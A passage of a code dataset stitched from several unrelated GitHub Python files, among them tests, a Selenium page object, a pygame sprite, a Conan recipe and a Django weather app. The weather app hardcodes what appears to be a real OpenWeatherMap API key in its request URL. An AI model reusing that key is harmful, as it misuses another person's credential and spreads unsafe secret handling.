import Image\nfrom PIL import ImageChops\n\nfrom TwentyTwentiesHumorBot import ImageCaptioner\n\nclass ImageCaptionerTests(unittest.TestCase):\n\t\n\tdef setUp(self):\n\t\tself.captioner = ImageCaptioner(\"test_home\")\n\t\t# override defaults to a known value so the test doesn't break if defaults change later\n\t\tself.captioner.textColor = (255, 255, 255)\n\t\tself.captioner.textStrokeColor = (0, 0, 0)\n\t\tself.captioner.textPadding = 20\n\t\tself.captioner.startingFontSize = 12\n\t\tself.captioner.strokeDivisor = 20\n\t\t\n\t\tself.filename = \"pexels - 1170986 - EVG_Kowalievska - 'cat'.jpg\"\n\t\tself.expectedFilename = \"pexels - 1170986 - EVG_Kowalievska - 'cat' - captioned.jpg\"\n\t\n\tdef testOutputMatchesExpected(self):\n\t\t'''\n\t\tThis test runs the captioner on a known image and verifies that its results don't change on the next run.\n\t\tIf you even slightly change the algorithm this is likely to change (and break the test).\n\t\tThis is a little more ham-fisted of a way to test this class than I'd like, but testing image manipulation code is tough\n\t\tto do at a fine grained level because it's output is an image, not some discreet data I can run asserts on.\n\t\t'''\n\t\tif not os.path.exists(os.path.join(\"test_home\", \"font\")):\n\t\t\traise RuntimeError(\"Font file not accessible. The font is not legally redistributable, so it is not available in source control, so please provide one in the directory test_home/font\")\n\t\twith tempfile.TemporaryDirectory() as tempdir:\n\t\t\toutput = self.captioner.writeText(os.path.join(\"test_data\", self.filename), tempdir, \"test\")\n\t\t\tself.assertEqual(output, os.path.join(tempdir, self.filename))\n\t\t\tself.assertTrue(os.path.exists(os.path.join(tempdir, self.filename)))\n\t\t\tself.assertSameImage(os.path.join(tempdir, self.filename), os.path.join(\"test_data\", self.expectedFilename))\n\t\n\tdef assertSameImage(self, pathOne, pathTwo):\n\t\timage_one = Image.open(pathOne)\n\t\timage_two = Image.open(pathTwo)\n\n\t\tdiff = ImageChops.difference(image_one, image_two)\n\n\t\tif diff.getbbox():\n\t\t\traise AssertionError('images are different')","repo_name":"HelloLobsterDog/2020sHumorBot","sub_path":"tests/testImageCaptioner.py","file_name":"testImageCaptioner.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11479115897","text":"from core import BasePage\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import InvalidArgumentException\nfrom selenium.common.exceptions import TimeoutException\nfrom pages.components.modals import Modals\nfrom api.api import ApiEu\nfrom api.api import ApiModels\nfrom pages.login_po import LoginPage\n\n\nclass EuHeader(BasePage):\n LOCATOR_EU_PAGE_TITLE = (By.XPATH, \"//div[@class='user-menu-page-title']\")\n LOCATOR_EU_USER_MENU = (By.XPATH, \"//div[contains(@class, 'user-menu ')]\")\n LOCATOR_EU_MENU_BUTTON = (By.XPATH, \"//fa-icon[contains(@class, 'menu-button')]\")\n LOCATOR_EU_SELECTED_PLAN_TEXT = (By.XPATH, \"//pkm-dropdown[contains(@class, 'plans-dropdown')]//div[contains(@class, 'dropdown')]\")\n LOCATOR_EU_PLAN_DROPDOWN = (By.XPATH, \"//pkm-dropdown[contains(@class, 'plans-dropdown')]//div[contains(@class, 'dropdown')]\")\n LOCATOR_EU_PLAN_DROPDOWN_VALUES = (By.XPATH, \"//div[contains(@class, 'dropdown-list')]//pkm-dropdown-item\")\n LOCATOR_EU_LOGOUT_BUTTON = (By.XPATH, \"//div[contains(@class, 'menu-item') and text()=' Выход ']\")\n\n def __init__(self, driver):\n BasePage.__init__(self, driver)\n self.login_page = LoginPage(driver)\n\n def get_title_text(self):\n text = self.get_element_text(self.LOCATOR_EU_PAGE_TITLE, time=15)\n return text\n\n def open_menu(self):\n self.find_and_click(self.LOCATOR_EU_MENU_BUTTON)\n assert self.find_element(self.LOCATOR_EU_USER_MENU, time=5), 'Невозможно открыть меню'\n\n def navigate_to_page(self, page_name):\n title = self.get_title_text()\n if title == page_name.upper():\n pass\n else:\n self.open_menu()\n button = (By.XPATH, f\"//div[contains(@class, 'menu-item ') and text() = ' {page_name} ']\")\n self.find_and_click(button)\n self.wait_until_text_in_element(self.LOCATOR_EU_PAGE_TITLE, page_name.upper())\n\n def logout(self):\n self.open_menu()\n self.find_and_click(self.LOCATOR_EU_LOGOUT_BUTTON)\n self.login_page.find_element(self.login_page.LOCATOR_PKM_LOGIN_EU_BUTTON)\n\n def get_plan_dropdown_placeholder(self):\n value = self.find_element(self.LOCATOR_EU_SELECTED_PLAN_TEXT)\n return value.text\n\n def expand_plan_dropdown(self):\n dropdown = self.find_element(self.LOCATOR_EU_PLAN_DROPDOWN)\n if 'focused' not in dropdown.get_attribute('class'):\n self.find_and_click(self.LOCATOR_EU_PLAN_DROPDOWN)\n\n def hide_plan_dropdown(self):\n dropdown = self.find_element(self.LOCATOR_EU_PLAN_DROPDOWN)\n if 'focused' in dropdown.get_attribute('class'):\n self.find_and_click(self.LOCATOR_EU_PLAN_DROPDOWN)\n\n def get_plan_dropdown_values(self):\n values = []\n self.expand_plan_dropdown()\n dropdown_values = self.driver.find_elements(*self.LOCATOR_EU_PLAN_DROPDOWN_VALUES)\n for value in dropdown_values:\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", value)\n values.append(value.text)\n self.hide_plan_dropdown()\n return values\n\n def check_plan_dropdown_values(self):\n dropdown_values = self.get_plan_dropdown_values()\n api = self.api_creator.get_api_eu()\n plan_names = api.api_get_plans(names_only=True)\n assert self.compare_lists(dropdown_values, plan_names), 'В дропдауне версий отображаются не все планы'\n\n def select_plan(self, plan_uuid=None, plan_name=None):\n self.expand_plan_dropdown()\n if plan_uuid:\n value_locator = (By.XPATH, f\"(//div[contains(@class, 'dropdown-list')]//pkm-dropdown-item)[@test-plan-uuid='{plan_uuid}']\")\n value = self.find_element(value_locator)\n if plan_name:\n assert value.text == plan_name\n value.click()\n else:\n value_locator = (By.XPATH, f\"//div[@class='content' and contains(text(),' {plan_name} ')]/../..\")\n value = self.find_element(value_locator)\n if plan_uuid:\n assert value.get_attribute('test-plan-uuid') == plan_uuid\n value.click()\n if plan_name:\n assert self.get_plan_dropdown_placeholder() == plan_name\n\n\n\n\n\n\n\n\n","repo_name":"vmiloserdov1981/KS-auto-tests","sub_path":"pages/components/eu_header.py","file_name":"eu_header.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17087276405","text":"class LFUCache:\n\n def __init__(self, capacity: int):\n self.d = {}\n self.f = defaultdict(dict)\n self.c = capacity\n self.m = 1\n \n def get(self, key: int) -> int:\n if key not in self.d: return -1\n x = self.d.pop(key)\n v = self.f[x].pop(key)\n if not self.f[x] and self.m == x:\n self.m += 1\n self.f[x+1][key] = v\n self.d[key] = x + 1\n return v\n \n def put(self, key: int, value: int) -> None:\n if self.c <= 0: return\n if key in self.d:\n self.get(key)\n self.f[self.d[key]][key] = value\n return\n \n if len(self.d) >= self.c:\n k = next(iter(self.f[self.m]))\n self.f[self.m].pop(k)\n self.d.pop(k)\n \n self.d[key] = 1\n self.f[1][key] = value\n self.m = 1\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0460-lfu-cache/0460-lfu-cache.py","file_name":"0460-lfu-cache.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73871222506","text":"from Game_Settings import *\r\n\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.image.load(os.path.join(img_folder, \"Space_Invaders_Ship.png\")).convert()\r\n self.image.set_colorkey(black)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = int(width / 2)\r\n self.rect.bottom = height - 25\r\n self.speedx = 0\r\n self.speedy = 0\r\n\r\n def update(self):\r\n self.speedx = 0\r\n self.speedy = 0\r\n keystate = pygame.key.get_pressed()\r\n if keystate[pygame.K_LEFT]:\r\n self.speedx = -1\r\n if keystate[pygame.K_RIGHT]:\r\n self.speedx = 1\r\n self.rect.x += self.speedx\r\n if self.rect.right > width:\r\n self.rect.right = width\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n\r\n","repo_name":"jtbarwell/Space-Invaders","sub_path":"Player_Class.py","file_name":"Player_Class.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35394213885","text":"from django.shortcuts import render, redirect\nfrom .models import City\nfrom .forms import CityForm\nimport requests\nimport datetime\n\ndef index(request) :\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=58f612f7fc0f3705abca1bc65ae1f855'\n error_msg = ''\n msg = ''\n msg_class = ''\n # city = 'India'\n\n if request.method == 'POST':\n form = CityForm(request.POST)\n if form.is_valid():\n new_city = form.cleaned_data['name']\n # existing_city_count = City.objects.filter(name = new_city).count()\n r = requests.get(url.format(new_city)).json()\n # print(\"Check \" + str(r))\n # getting validation for invalid city\n if r['cod'] == 200:\n form.save()\n else :\n error_msg = \"Invalid City\"\n # else :\n # error_msg = \"City Already Exists\"\n if error_msg :\n msg = error_msg\n # giving css style\n msg_class = \"danger\"\n else :\n # msg = \"City Added Successfully\"\n msg_class = \"success\"\n\n form = CityForm()\n\n cities = City.objects.all()\n count = cities.count()\n # print(\"Count is \" + str(count))\n\n if count == 0 :\n return render(request, 'weatherapp/clear.html', {'form' : form})\n else :\n # condition for valid city\n for city in cities :\n r = requests.get(url.format(city)).json()\n # print(r)\n\n date_time = datetime.datetime.now().strftime('%H:%M')\n # print(\"Time is\" + str(date_time))\n date = datetime.date.today()\n # print(\"Date is\" + str(date))\n\n city_weather = {\n 'city': city.name,\n 'temprature' : r['main']['temp'],\n 'description' : r['weather'][0]['description'],\n 'icon' : r['weather'][0]['icon'],\n 'presure' : r['main']['pressure'],\n 'humidity' : r['main']['humidity'],\n 'wind_speed' : r['wind']['speed'],\n 'date' : date,\n 'date_time' : date_time\n }\n\n print(city_weather)\n\n context = {\n 'city_weather' : city_weather,\n 'form' : form,\n 'msg' : msg,\n 'msg_class' : msg_class\n }\n\n return render(request, 'weatherapp/index.html', context)\n\n\ndef clear(request):\n # if user delete the cities\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=58f612f7fc0f3705abca1bc65ae1f855'\n\n if request.method == 'POST':\n form = CityForm(request.POST)\n if form.is_valid():\n new_city = form.cleaned_data['name']\n r = requests.get(url.format(new_city)).json()\n if r['cod'] == 200:\n form.save()\n\n return redirect('index')\n else :\n City.objects.all().delete()\n form = CityForm()\n context = {'form' : form }\n return render(request, 'weatherapp/clear.html', context)\n","repo_name":"Eugin-Paul/Weather-App","sub_path":"weather_project/weatherapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6873620691","text":"class Solution:\n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n goal = (1 << n) - 1\n queue = collections.deque((x,1 << x) for x in range(n))\n steps = collections.defaultdict(lambda: n*n)\n for i in range(n): steps[i,1<<i]=0\n while queue:\n cn,cp=queue.popleft()\n cs=steps[cn,cp]\n if cp == goal: return cs\n for c in graph[cn]:\n chs= cp | ( 1 << c)\n if steps[c,chs]>cs+1:\n steps[c,chs]=cs+1\n queue.append((c,chs))","repo_name":"akkinasrikar/leetcode-problems","sub_path":"847-shortest-path-visiting-all-nodes/847-shortest-path-visiting-all-nodes.py","file_name":"847-shortest-path-visiting-all-nodes.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1364156313","text":"from conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass CspiceConan(ConanFile):\n name = \"cspice\"\n description = \"NASA C SPICE library\"\n license = \"TSPA\"\n topics = (\"spice\", \"naif\", \"kernels\", \"space\", \"nasa\", \"jpl\", \"spacecraft\", \"planet\", \"robotics\")\n homepage = \"https://naif.jpl.nasa.gov/naif/toolkit.html\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"utilities\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"utilities\": True,\n }\n\n generators = \"cmake\"\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def validate(self):\n sources_url_per_triplet = self.conan_data[\"sources\"][self.version][\"url\"]\n the_os = self._get_os_or_subsystem()\n if the_os not in sources_url_per_triplet:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1}\".format(self.version, the_os)\n )\n compiler = str(self.settings.compiler)\n if compiler not in sources_url_per_triplet[the_os]:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1} on {2}\".format(self.version, compiler, the_os)\n )\n arch = str(self.settings.arch)\n if arch not in sources_url_per_triplet[the_os][compiler]:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1} on {2} {3}\".format(self.version, compiler, the_os, arch)\n )\n\n def _get_os_or_subsystem(self):\n if self.settings.os == \"Windows\" and self.settings.os.subsystem != \"None\":\n os_or_subsystem = str(self.settings.os.subsystem)\n else:\n os_or_subsystem = str(self.settings.os)\n return os_or_subsystem\n\n def source(self):\n pass\n\n def build(self):\n self._get_sources()\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def _get_sources(self):\n the_os = self._get_os_or_subsystem()\n compiler = str(self.settings.compiler)\n arch = str(self.settings.arch)\n url = self.conan_data[\"sources\"][self.version][\"url\"][the_os][compiler][arch]\n sha256 = self.conan_data[\"sources\"][self.version][\"sha256\"][the_os][compiler][arch]\n if url.endswith(\".tar.Z\"): # Python doesn't have any module to uncompress .Z files\n filename = os.path.basename(url)\n tools.download(url, filename, sha256=sha256)\n command = \"zcat {} | tar -xf -\".format(filename)\n self.run(command=command)\n os.remove(filename)\n else:\n tools.get(url, sha256=sha256)\n tools.rename(self.name, self._source_subfolder)\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"BUILD_UTILITIES\"] = self.options.utilities\n self._cmake.configure()\n return self._cmake\n\n def package(self):\n tools.save(os.path.join(self.package_folder, \"licenses\", \"LICENSE\"), self._extract_license())\n cmake = self._configure_cmake()\n cmake.install()\n\n def _extract_license(self):\n spiceusr_header = tools.load(os.path.join(self._source_subfolder, \"include\", \"SpiceUsr.h\"))\n begin = spiceusr_header.find(\"-Disclaimer\")\n end = spiceusr_header.find(\"-Required_Reading\", begin)\n return spiceusr_header[begin:end]\n\n def package_info(self):\n self.cpp_info.libs = [\"cspice\"]\n if self.settings.os == \"Linux\":\n self.cpp_info.system_libs.append(\"m\")\n\n if self.options.utilities:\n bin_path = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\".format(bin_path))\n self.env_info.PATH.append(bin_path)\n","repo_name":"SpaceIm/conan-cspice","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25655310983","text":"from django.urls import path\nfrom .views import PostList, PostDetail, PostSearch, PostUpdateView, PostDeleteView, PostCreate, ArticleList, \\\n UserUpdateView, GradientView, CategoryList, add_subscribe, IndexView\nfrom django.views.decorators.cache import cache_page\n\n# Если вы используете классовые представления или дженерики, то нужно добавлять кэширование напрямую в urls.py\n# (в котором хранятся именно сами представления, а не основной urls.py из папки с settings.py).\nurlpatterns = [\n path('', PostList.as_view()),\n path('article/', ArticleList.as_view(), name='article_list'),\n path('<int:pk>', cache_page(300)(PostDetail.as_view())), # добавим кэширование на детали товара. Раз в 100 сек товар будет записываться в кэш для экономии ресурсов.\n path('search/', PostSearch.as_view(), name='search'),\n path('<int:pk>/edit/', PostUpdateView.as_view(), name='edit'),\n path('<int:pk>/delete', PostDeleteView.as_view(), name='post_delete'),\n path('create/', PostCreate.as_view(), name='post_create'),\n path('user/', UserUpdateView.as_view(), name='user_update'),\n path('gradient/', GradientView.as_view(), name='gradient'),\n path('sub/', CategoryList.as_view(), name='category'), # Путь к списку категорий с кнопками на подписку\n path('sub/subscribe/', add_subscribe, name='subscribe'),\n path('', IndexView.as_view())\n]\n","repo_name":"KappaPower/D8-13","sub_path":"NewsPortal/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40925768577","text":"import pytest\nimport task_24_2a\nfrom netmiko.cisco.cisco_ios import CiscoIosSSH\nimport sys\n\nsys.path.append(\"..\")\n\nfrom pyneng_common_functions import check_class_exists, check_attr_or_method\n\n# Checking that the test is called via pytest ... and not python ...\nfrom _pytest.assertion.rewrite import AssertionRewritingHook\n\nif not isinstance(__loader__, AssertionRewritingHook):\n print(f\"Tests should be called using this expression:\\npytest {__file__}\\n\\n\")\n\n\ndef test_class_created():\n check_class_exists(task_24_2a, \"MyNetmiko\")\n\n\ndef test_class_inheritance(first_router_from_devices_yaml):\n ssh = task_24_2a.MyNetmiko(**first_router_from_devices_yaml)\n ssh.disconnect()\n assert isinstance(ssh, CiscoIosSSH), \"MyNetmiko class must inherit from CiscoIosSSH\"\n check_attr_or_method(ssh, method=\"send_command\")\n check_attr_or_method(ssh, method=\"_check_error_in_command\")\n\n\n@pytest.mark.parametrize(\n \"error,command\",\n [\n (\"Invalid input detected\", \"sh ip br\"),\n (\"Incomplete command\", \"copy\"),\n (\"Ambiguous command\", \"a\"),\n ],\n)\ndef test_errors(first_router_from_devices_yaml, command, error):\n ssh = task_24_2a.MyNetmiko(**first_router_from_devices_yaml)\n output = ssh.send_command(\"sh run | i hostname\")\n assert (\n \"hostname\" in output\n ), \"After creating an instance of the class, you must connect to the equipment and switch to enable mode\"\n\n with pytest.raises(task_24_2a.ErrorInCommand) as excinfo:\n return_value = ssh.send_command(command)\n ssh.disconnect()\n assert error in str(\n excinfo\n ), \"send_command method should raise an exception when the command is executed with an error\"\n","repo_name":"natenka/pyneng-examples-exercises-en","sub_path":"exercises/24_oop_inheritance/test_task_24_2a.py","file_name":"test_task_24_2a.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"2793208047","text":"#!/usr/bin/python\n\nimport sys, os\n\n\"\"\"\nGROUPS\n\nDefines constants for CONF (the name of the conference), and for the names of each group.\nAll other groups will be named by joining the name with CONF: <CONF>/<NAME>\n\nExample:\n\n CONF = 'my.conference/2017'\n PROGRAM_CHAIRS = 'Program_Chairs'\n\n --> my.conference/2017/Program_Chairs\n\n\"\"\"\n\nCONF = \"swsa.semanticweb.org/ISWC/2017/DeSemWeb\"\nADMIN = CONF + '/Admin'\nPROGRAM_CHAIRS = CONF + '/Program_Chairs'\nAREA_CHAIRS = CONF + '/Area_Chairs'\nREVIEWERS = CONF + '/Reviewers'\n\"\"\"24 August 23:59:59 Hawaii Time\n == GMT: Friday, August 25, 2017 9:59:59 AM\"\"\"\nDUE_TIMESTAMP = 1503698399000\nWEBPATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/conf.html'))\n\n\"\"\"\nINVITATIONS\n\nDefines constants for various invitations.\nThe full name of an invitation will be generated by joining the name with CONF by \"/-/\": <CONF>/-/<INVITATION_NAME>\n\nExample:\n\n CONF = 'my.conference/2017'\n SUBMISSION = 'Submission'\n\n --> my.conference/2017/-/Submission\n\n\"\"\"\n\nSUBMISSION = CONF + '/-/Submission'\nCOMMENT = CONF + '/-/Comment'\n\n\n\"\"\"\nPARAMETERS\n\nDictionaries that represent argument combinations defining Group and Invitation permissions.\n\nExample:\n\n restricted = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'signatories': [CONF],\n }\n\n The \"restricted\" configuration above will only allow the CONF group to read, write, and sign\n for the newly created Group that uses it.\n\"\"\"\n\ngroup_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\nsubmission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/submissionProcess.js'))\n}\n\ncomment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'))\n}\n\n\"\"\"\nTEMPLATES\n\n\"\"\"\n\n\nsubmission_reply = {\n 'forum': None,\n 'replyto': None,\n 'invitation': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'title': {\n 'description': 'Title of paper.',\n 'order': 1,\n 'value-regex': '.{1,250}',\n 'required':True\n },\n 'submission category': {\n 'description': 'Select a submission category',\n 'order': 2,\n 'value-radio': ['Research Article','Intelligent Client Challenge / Demo', 'Vision Statement'],\n 'required': True\n },\n 'authors': {\n 'description': 'Comma separated list of author names.',\n 'order': 3,\n 'values-regex': \"[^;,\\\\n]+(,[^,\\\\n]+)*\",\n 'required':True\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, lowercased, in the same order as above. For authors with existing OpenReview accounts, please make sure that the provided email address(es) match those listed in the author\\'s profile.',\n 'order': 4,\n 'values-regex': \"([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,},){0,}([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,})\",\n 'required':True\n },\n 'keywords': {\n 'description': 'Comma separated list of keywords.',\n 'order': 6,\n 'values-regex': \"(^$)|[^;,\\\\n]+(,[^,\\\\n]+)*\"\n },\n 'TL;DR': {\n 'description': '\\\"Too Long; Didn\\'t Read\\\": a short sentence describing your paper',\n 'order': 7,\n 'value-regex': '[^\\\\n]{0,250}',\n 'required':False\n },\n 'abstract': {\n 'description': 'Abstract of paper.',\n 'order': 8,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'required':True\n },\n 'pdf': {\n 'description': 'Upload a PDF file or submit a PDF URL (PDF URLs must begin with \"http\" or \"https\" and end with \".pdf\"). Submit all other formats in the \"url\" field below.',\n 'order': 9,\n 'value-regex': 'upload|http(s)?:\\/\\/.+\\.pdf',\n 'required': False\n },\n 'url': {\n 'description': 'Submit a non-PDF URL (e.g. HTML submissions). URLs must begin with \"http\" or \"https\".',\n 'order': 10,\n 'value-regex': 'http(s)?:\\/\\/.+',\n 'required': False\n }\n }\n}\n\ncomment_reply = {\n 'forum': None,\n 'replyto': None,\n 'invitation': SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply.',\n 'required': True\n }\n }\n}\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/swsa.semanticweb.org/ISWC/2017/DeSemWeb/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"72948772268","text":"# Checking diffeomorphism\n\n# delay_embedded_system_no = 24\n# RUN_NO = 3\n\n# delay_embedded_system_no = 34\n# RUN_NO = 1\n\ndelay_embedded_system_no = 44\nRUN_NO = 0\n\n# delay_embedded_system_no = 53\n# RUN_NO = 1\n\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom itertools import product\nimport random\nimport seaborn as sb\nfrom sklearn.preprocessing import Normalizer, MinMaxScaler, StandardScaler\nfrom sklearn.metrics import r2_score\nimport copy\nimport pickle\nplt.rcParams[\"font.family\"] = \"Avenir\"\nplt.rcParams[\"mathtext.fontset\"] = \"cm\"\nplt.rcParams[\"font.size\"] = 22\nimport os\nimport shutil\nimport tensorflow as tf\nimport math\n\ndef weight_variable(shape):\n std_dev = math.sqrt(3.0 / (shape[0] + shape[1]))\n return tf.Variable(tf.truncated_normal(shape, mean=0.0, stddev=std_dev, dtype=tf.float32))\ndef bias_variable(shape):\n std_dev = math.sqrt(3.0 / shape[0])\n return tf.Variable(tf.truncated_normal(shape, mean=0.0, stddev=std_dev, dtype=tf.float32))\ndef initialize_Wblist(n_u, hv_list):\n # INITIALIZATION - going from input to first layer\n W_list = [weight_variable([n_u, hv_list[0]])]\n b_list = [bias_variable([hv_list[0]])]\n # PROPAGATION - consecutive layers\n for k in range(1,len(hv_list)):\n W_list.append(weight_variable([hv_list[k - 1], hv_list[k]]))\n b_list.append(bias_variable([hv_list[k]]))\n return W_list, b_list\n\n\ndef get_dict_param(run_folder_name_curr,SYS_NO,sess):\n dict_p = {}\n saver = tf.compat.v1.train.import_meta_graph(run_folder_name_curr + '/System_' + str(SYS_NO) + '_DeepDMDdata_Scaled.pickle.ckpt.meta', clear_devices=True)\n saver.restore(sess, tf.train.latest_checkpoint(run_folder_name_curr))\n try:\n psixpT = tf.get_collection('psixpT')[0]\n psixfT = tf.get_collection('psixfT')[0]\n xpT_feed = tf.get_collection('xpT_feed')[0]\n xfT_feed = tf.get_collection('xfT_feed')[0]\n KxT = tf.get_collection('KxT')[0]\n KxT_num = sess.run(KxT)\n dict_p['psixpT'] = psixpT\n dict_p['psixfT'] = psixfT\n dict_p['xpT_feed'] = xpT_feed\n dict_p['xfT_feed'] = xfT_feed\n dict_p['KxT_num'] = KxT_num\n except:\n print('State info not found')\n try:\n ypT_feed = tf.get_collection('ypT_feed')[0]\n yfT_feed = tf.get_collection('yfT_feed')[0]\n dict_p['ypT_feed'] = ypT_feed\n dict_p['yfT_feed'] = yfT_feed\n WhT = tf.get_collection('WhT')[0]\n WhT_num = sess.run(WhT)\n dict_p['WhT_num'] = WhT_num\n except:\n print('No output info found')\n return dict_p\n\n# Load the dataset\nsimulation_data_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_SimulatedData.pickle'\nwith open(simulation_data_file, 'rb') as handle:\n ls_data = pickle.load(handle)\n# Load the simulation info [required to convert the data to the required format]\nsimulation_datainfo_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_SimulatedDataInfo.pickle'\nwith open(simulation_datainfo_file, 'rb') as handle:\n dict_data_info = pickle.load(handle)\nls_output_indices = dict_data_info['ls_measured_output_indices']\nn_outputs = len(ls_output_indices)\n# Load the scalers\nscaler_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_DataScaler.pickle'\nwith open(scaler_file, 'rb') as handle:\n dict_Scaler = pickle.load(handle)\nZ_Scaler = dict_Scaler['XT']\n\nn_delay_embedding = np.int(np.mod(delay_embedded_system_no,10))\nXdim = ls_data[0]['XT'].shape[1]\nYdim = len(ls_output_indices)\nn_timepts = ls_data[0]['XT'].shape[0]\nZdim = Ydim*n_delay_embedding\n\n\n# Organizing the data\ninput_X_data = np.empty((0,Xdim))\ninput_Y_data = np.empty((0,Ydim))\ninput_Z_data = np.empty((0,n_delay_embedding*Ydim))\nfor data_i in ls_data:\n for i in range(n_timepts - n_delay_embedding):\n input_X_data = np.concatenate([input_X_data, data_i['XT'][i:i + 1, :]],axis=0)\n input_Y_data = np.concatenate([input_Y_data, data_i['YT'][i:i + 1, ls_output_indices]], axis=0)\n input_Z_data = np.concatenate([input_Z_data, data_i['YT'][i:i + n_delay_embedding, ls_output_indices].T.reshape(1, -1)], axis=0)\n\n# Separate the data into training, validation and test\nn_train = np.int(np.ceil(input_Y_data.shape[0]/3))\nX_train_data = input_X_data [0:n_train,:]\nY_train_data = input_Y_data [0:n_train,:]\nZ_train_data = input_Z_data [0:n_train,:]\nX_valid_data = input_X_data [n_train:2*n_train,:]\nY_valid_data = input_Y_data [n_train:2*n_train,:]\nZ_valid_data = input_Z_data [n_train:2*n_train,:]\nX_test_data = input_X_data [2*n_train:,:]\nY_test_data = input_Y_data [2*n_train:,:]\nZ_test_data = input_Z_data [2*n_train:,:]\n\n# Define a Scaler for the state\nX_Scaler = StandardScaler()\nX_Scaler.fit(X_train_data)\nY_Scaler = 